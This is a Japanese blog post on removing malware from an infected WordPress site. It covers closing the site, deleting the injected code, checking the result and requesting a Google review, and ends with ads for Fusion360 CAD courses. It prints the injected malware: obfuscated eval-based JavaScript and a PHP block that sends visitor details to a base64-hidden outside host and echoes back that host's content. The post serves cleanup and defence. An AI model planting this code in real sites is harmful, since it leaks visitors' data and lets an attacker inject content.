HOME >>  管理人ノート > ワードプレスで構築したサイトが、マルウェアに感染しました【駆除編】

ワードプレスで構築したサイトが、マルウェアに感染しました【駆除編】

時系列編で、一連の流れを書きましたが、今回やられたマルウェア駆除の仕方を書いておきます。

こういうのって名前が無いのかなぁ・・・・、検索に引っかかりやすいように、再度記事の内容を書いておきます。

ワードプレス(WP)がマルウェアに感染した時の対処方法(駆除方法)です。

1.落ち着く

偉そうな事書いてますが、パニックになってもどーしよーもないので、深呼吸でもしてください

2.サイトを閉鎖

手段はなんでもいいです。ユーザーがアクセスできなくなれば、基本認証だろうが、ファイルを落とすだろうが、サーバーの管理権限があるなら、アクセス規制をかけても、なんでいいです。

3.駆除方法

ワードプレスは基本的に、phpによって出力されるので、生成元のコードを探して削除する。

▼HTMLソースに出力されるコード

  1. <script>ss=String;ps=”sp”+”l”+”i”+”t”;asd=function(){++d.body};a=(“15,15,155,152,
  2. <カンマ、数字の羅列がたくさん>
  3. ,15,15,201″[ps](“,”));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-6)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(ss[“fr”+”omCharCode”].apply(ss,a));</script>

▼PHPに記載されたコード

  1. <?php
  2. if (!isset($sRetry))
  3. {
  4. global $sRetry;
  5. $sRetry = 1;
  6. // This code use for global bot statistic
  7. $sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); // Looks for google serch bot
  8. $stCurlHandle = NULL;
  9. $stCurlLink = “”;
  10. if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
  11. {
  12. if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create bot analitics 
  13. $stCurlLink = base64_decode( ‘aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw’).’?ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=’.urlencode($sUserAgent) . ‘&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]) . ‘&fullpath=’ . urlencode($_SERVER[‘REQUEST_URI’]) . ‘&check=’.isset($_GET[‘look’]);
  14. @$stCurlHandle = curl_init( $stCurlLink ); 
  15. }
  16. if ( $stCurlHandle !== NULL )
  17. {
  18. curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  19. curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
  20. $sResult = @curl_exec($stCurlHandle); 
  21. if ($sResult[0]==”O”) 
  22. {$sResult[0]=” “;
  23. echo $sResult; // Statistic code end
  24. }
  25. curl_close($stCurlHandle); 
  26. }
  27. }
  28. ?>

▼駆除対象のファイル一覧と処理

ファイルのPASSとファイル名 駆除方法 備考
index.php 何もしない
wp-admin/index.php 不要コードの削除
wp-content/index.php PHPの閉じコードが無いので最後に「?>」を入れる
wp-content/plugins/index.php 不要コードの削除
wp-content/themes/index.php 本来なくていいので、ファイルごと削除
wp-content/themes/index.php 不要コードの削除
wp-content/themes/pinboard/footer.php 不要コードの削除
wp-content/themes/pinboard/index.php 不要コードの削除
wp-content/themes/pinboard/page.php 不要コードの削除
wp-content/themes/twentyeleven/footer.php 不要コードの削除
wp-content/themes/twentyeleven/index.php 不要コードの削除
wp-content/themes/twentyeleven/page.php 不要コードの削除
wp-content/themes/twentyten/footer.php 不要コードの削除
wp-content/themes/twentyten/index.php 不要コードの削除
wp-content/themes/twentytwelve/footer.php 不要コードの削除
wp-content/themes/twentytwelve/index.php 不要コードの削除
wp-content/themes/twentytwelve/page.php 不要コードの削除
wp-includes/template.php 何もしない ヴァージョンによって、あったりなかったりするので、よく確認すること!

4.ファイルをアップして実機確認

実機確認の再、Chromeだと、アクセスが禁止されてるので、以下の「ご自身の責任で判断されるようお願いします」を押すとアクセスできます。

ichizi_03

基本は、問題のコードが記述されていないか、目視確認!!

また、キャッシュがある場合は、そちらが更新されないと、変わらないので、キャッシュをクリアーしてください。

5.Googleに再申請

審査の申し込みは、ウェブマスターツール→マルウェア→「審査をリクエス」ボタンを押すだけ。

 

【備考】

ウィルス対策ソフトや、オンラインで確認できるサイトで、感染後にチェックすると、駆除したのにもかかわらず、危険のメッセージが出う場合があるようです。これは、Googleの感染サイトリストを参照しているようで、タイムラグがあるようです。時間があれば、再審査の申告ができるならば、しておくといいです。

 

以上

 

無料でFusion360を学べる

一ヶ月でFusion360をマスターするオリジナルノウハウを読むことができます。
  • 無料メールセミナーの詳細へ

Fusion360や3DCADを
より本格的に学びたい方はこちらへ!

【Fusion360初級】モノづくりのための3DCAD入門

初めての人でも学びやすい3DCAD・Fusion360を使い、モノづくりのための3D技術を学びます。
本講座は、ソフトの習得に重点が置かれる一般的な3DCADセミナーとは異なり、実際の製品に近い3Dモデルをテーマにしています。
最初は簡単なモデルから初めて、徐々に工業製品レベルの構造を作っていきます。

  1. 初めての人でも学びやすいFusion360(3DCAD)
  2. 「モノづくり」を始めるため、実際の製品をテーマ学習
  3. 部品同士を組み合わせ、「可動するモノ」を設計する
  Fusion360初級の詳細へ
工業デザイン:サングラス 工業デザイン:サングラス 工業デザイン:サングラス 工業デザイン:サングラス

【Fusion360専門】どんな3D形状でも素早く作れる!驚きの技術スカルプト

Fusion360の基本操作をある程度マスターした方を対象に!
Fusion360特有のモデリング機能が「スカルプト」です。 粘土をこねるような独特感覚で、従来の3DCADの常識を超える、直感的で素早いモデリングを行うことができます。

  1. スカルプトなら、粘土のように“あっという間に”モデリング
  2. スカルプトの仕組みを、しっかり理解できるカリキュラム
  3. 寸法や肉厚がある。ちゃんと使えるデータ作り
  スカルプトの詳細へ
工業デザイン:サングラス 工業デザイン:サングラス 工業デザイン:サングラス 工業デザイン:サングラス